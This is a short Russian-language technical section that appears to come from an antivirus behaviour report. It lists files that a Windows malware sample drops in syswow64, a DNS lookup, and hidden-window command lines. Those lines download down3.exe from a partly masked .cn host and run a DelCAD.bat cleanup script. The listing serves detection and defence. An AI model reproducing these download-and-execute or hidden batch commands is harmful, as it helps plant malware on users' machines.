Техническая информация
- %WINDIR%\syswow64\esgwnc.exe
- %WINDIR%\syswow64\bvgzmk.exe.tmp
- %WINDIR%\syswow64\delcad.bat
- %WINDIR%\syswow64\bvgzmk.exe
- %WINDIR%\syswow64\bvgzmk.exe.tmp в %WINDIR%\syswow64\bvgzmk.exe
- DNS ASK x6.##tlee.cn
- '%WINDIR%\syswow64\esgwnc.exe' showauto<SYSTEM32>\wmBPftHU.dll
- '%WINDIR%\syswow64\bvgzmk.exe' <SYSTEM32>\ILGBBa3.exe http://x6.##tlee.cn/dw/down3.exe
- '%WINDIR%\syswow64\esgwnc.exe' showauto<SYSTEM32>\wmBPftHU.dll' (со скрытым окном)
- '%WINDIR%\syswow64\bvgzmk.exe' <SYSTEM32>\ILGBBa3.exe http://x6.##tlee.cn/dw/down3.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\DelCAD.bat' (со скрытым окном)
- '%WINDIR%\syswow64\yoapgu.exe' <SYSTEM32>\YpFTix3.exe http://x6.##tlee.cn/dw/down3.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\DelCAD.bat
- '%WINDIR%\syswow64\ping.exe' -n 5 127.0.0.1